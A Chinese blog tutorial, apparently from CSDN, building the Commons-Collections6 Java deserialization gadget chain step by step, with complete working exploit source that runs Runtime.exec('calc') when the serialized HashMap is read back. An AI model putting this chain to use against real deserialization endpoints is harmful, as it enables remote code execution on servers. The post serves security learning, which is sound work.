Commons-Collections6 反序列化 从0开始手写exp

最新推荐文章于 2022-09-26 18:24:02 发布
最新推荐文章于 2022-09-26 18:24:02 发布
阅读量2.1k 收藏
点赞数
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124100545
版权

CC6

cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行

ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com)

如何手写exp

可以看到

image-20220410151034589

后半段仍然与yso的cc1一致(一直到LazyMap.get)

调用了TiedMapEntry,进去

image-20220410151622473

hashcode里面调用了getvalue

image-20220410151712355

这里是map.get

key对应的value如果改成恶意的类就可以触发反序列化

然后瞄了一眼构造函数发现是一个简单的传参初始化,而且是Public类

可以直接用之前写的hashmap

Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,chainedTransformer);

        TiedMapEntry tiedMapEntry = new new TiedMapEntry(lazyMap, "aaa");

然后后面直接new TiedMapEntry并且完善构造方法

随后运用到hashmap的readObject来完成反序列化,加上

      
        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

然后加上序列化反序列化

        serialize(map2);
        unserialize("ser.bin");

整个demo

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.rmi.CORBA.Tie;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

        serialize(map2);
        unserialize("ser.bin");
    }
}

仍然有问题,假如你把unserialize("ser.bin");注释的话,那么会发现serialize的时候就已经触发链子了,究其原因是hash.put的put里面有触发的函数

所以我们需要使用反射的方法写一下

		Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);

但是加上去后,

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

        Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);
        serialize(map2);
//        unserialize("ser.bin");
    }

仍然不可以谈计算器,经过下断点调试,会发现原来是

image-20220410154530875

这里直接跳过了,所以要把key删掉

lazyMap.remove("aaa");

完整demo

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.rmi.CORBA.Tie;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"aaa");
        lazyMap.remove("aaa");

        Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);
//        serialize(map2);
        unserialize("ser.bin");
    }
}

这样的话,序列化的时候不会触发恶意payload,反序列化才会触发

image-20220410155142127

image-20220410155125909

ththaiai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java序列(八)Common Collection 6分析
Vicl1fe的博客
09-26 311
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 java.io.Objec
apache-commons-collections6序列链分析
12-02 417
apache-commons-collections6序列链分析 apache-commons-collections6序列链利用的也是通过TiedMapEntry.getValue方法调用一系列的transform方法执行系统命令的,下面就分析分析这条链 复现环境 JDK7+CommonsCollections1 漏洞分析 看到CommonsCollections6类的getObject方法,前面是很熟悉的Transformer数组构造,数组构造和ACC5也是一样的,这里直接在实例Chained
Common-Collections 6
Christ1na的博客
09-26 335
这个利⽤链可以在Java 7和8的⾼版本触发,没有版本限制,所以通用性较强
CommonCollections6链分析
Demodd的博客
03-20 4198
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
java--commoncollections6 序列利用学习
zyer
05-12 244
总结 上周花了一周的时间学习commoncollections1,对java的序列利用好像有一丝丝的理解了。 暂时的思路就是:首先寻找存在对应方法的类,LazyMap-->get,TransformedMap-->setValue,put 从寻找一个存在readObject方法的类出发,通过寻找其它Object导致最后能触发上面的方法。 问题所在 从commoncollections1的学习发现,这条利用链对jdk版本有限制,高版本的jdk使用不了,具体原因就是在Java 8u71
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
exploits:一些实战中练习遇到,顺exp
04-16
exploits 一些实战中练习遇到,顺exp
『Java安全』序列-CC6序列漏洞POP链分析_ysoserial CommonsCollections6 PoC分析
Ho1aAs‘s Blog
03-13 570
文章目录前言代码复现工具类PoC代码审计 | 原理分析TiedMapEntry.hashCode()调用toString()方法POP链完 前言 CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录 代码复现 工具类 序列: UnserializePacked.Unserialize.java package UnserializePacked; import java.io.*; public class Unserialize { public static v
ysoserial CommonsColletions6分析
洋洋的小黑屋
07-10 132
CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法。 TiedMapEntry#hashCode 在CC5中,通过的是TiedMapEntry的toString调用到的LazyMap的get方法,而CC6则是通过TiedMapEntry的hashCode方法 此处hashCode会调用getValue方法,getValue就调用到了LazyMap的get方法 接下来我们要找的就是哪里调用了TiedMapEntry#hashCode HashMap#p
Commons-Collections1序列 从0开始exp
weixin_51458899的博客
04-10 676
mavenForHappyJson是我的cc序列链工程文件 参考https://space.bilibili.com/2142877265/video 参考Commons-Collections1序列 - Java序列 - CTF知识点 | mikufans = (viewofthai.link) 环境搭建 设置jdk8,下载Java Archive Downloads - Java SE 8 (oracle.com)自己找8u65,下载完后无脑安装,然后打开项目结构project struct
java6安全站点_Java安全之Commons Collections6分析
weixin_39611725的博客
02-27 188
Java安全之Commons Collections6分析0x00 前言其实在分析的几条链中都大致相同,都是基于前面一些链的变形,在本文的CC6链中,就和前面的有点小小的区别。在CC6链中也和CC5的利用链类似,但是CC6链中使用的是HashSet去触发LazyMap的get方法。而在CC5中使用的是BadAttributeValueExpException。0x01 POC分析这里还是去简一下...
深入了解Express:挑战Express(2), 支持中间件
qq_44746132的博客
05-27 157
这里将在上次路由的代码上进行变更,所以不会给出完整的代码,只会给出删改的部分,但是思路会说到的: Express中是支持中间件机制的,而中间件其实就是一个函数,在express执行过程中,中间件使用next()进行串联,而我们上次实现的路由机制中,我们也实现了Router层,Route层的next方法,使得在路由匹配的过程可以逐层向下匹配。 所以这里的实现机制就是利用上次的 路由实现,将中间件也和路由放到一个stack中,使得在这个匹配中可以使用一套next执行机制串联中间件和路由。 除了中间件
java序列 exp_JAVA序列exp及使用方法
weixin_36038435的博客
02-16 414
这两天很火的java序列漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本.其中weblogic和jenkins提供python脚本,但需自己加载payload.而对于jboss和websphere则提供了poc的数据包.更多信息在:foxgl...
Java代码审计——RMI基础利用
王嘟嘟的博客
12-23 2081
可以先看。
不删除“key“的CC6序列
include_voidmain的博客
08-10 157
不删除“key“的CC6序列
依赖项 maven:commons-collections:commons-collections:3.2.2 易受攻击
最新发布
12-27
依赖项 maven:commons-collections:commons-collections:3.2.2 存在安全漏洞,易受到攻击。这个漏洞可能会被恶意攻击者利用来执行远程代码,造成严重的安全问题。因此,建议及时更新为最新版本或者采取其他安全措施...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值